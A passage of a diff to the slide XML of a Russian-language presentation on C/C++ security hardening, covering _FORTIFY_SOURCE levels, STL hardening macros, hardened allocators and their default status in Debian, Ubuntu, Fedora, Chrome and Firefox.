+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>BZ #1852202</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>а </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Chrome </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
+              <a:t>нет</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -35096,7 +34868,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35123,7 +34895,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1952923550"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494840990"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35155,7 +34927,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFADEC6-171D-4ACB-9FCC-86BE492CE91F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35173,7 +34945,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL hardening: </a:t>
+              <a:t>_FORTIFY_SOURCE: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -35191,7 +34963,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C3255C-F753-4543-BECB-F71864F2D5F2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35202,7 +34974,12 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1834590"/>
+            <a:ext cx="10515600" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
@@ -35210,35 +34987,108 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Libstdc++:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для явного включения используются макросы </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(дефолтная </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
+              <a:t>Пока не появится </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=4</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t></a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по умолчанию в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -35246,60 +35096,135 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
-            </a:r>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включается в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по флагу </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не включена по умолчанию нигде</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>stdlib</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=libc++)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, Ubuntu </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с 2023</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -35307,59 +35232,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию для пакетов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>но не для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Google: Chrome and server systems</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -35368,7 +35253,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35395,7 +35280,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217243489"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1952923550"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35427,7 +35312,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E792084D-322A-4CB9-A936-45119E748D0D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35445,15 +35330,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Hardened allocators: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:t>STL hardening: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35463,7 +35348,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383FC83D-DCD4-4DBF-AB24-B5AB31F5E207}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35477,64 +35362,111 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>О</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libstdc++:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(дефолтная </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включается в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по флагу </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>бычно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>просто </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверки в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включаются по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>MALLOC_CHECK_=3 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GLIBC_TUNABLES=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>glibc.malloc.check</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=3</a:t>
-            </a:r>
+              <a:t>stdlib</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=libc++)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
@@ -35546,63 +35478,35 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Большинство дистрибутивов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Linux </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>используют </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc</a:t>
+              <a:t>Включена по умолчанию для пакетов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>но не для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Scudo </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по дефолту</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> hardened-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>аллокатор </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>PartitionAlloc</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Google: Chrome and server systems</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
@@ -35610,53 +35514,8 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>Efficient And Safe Allocations Everywhere!</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardened </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>аллокатор</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> :(</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Firefox and Chromium: Memory Allocator Hardening</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -35666,7 +35525,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35693,7 +35552,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015695599"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217243489"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35725,7 +35584,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
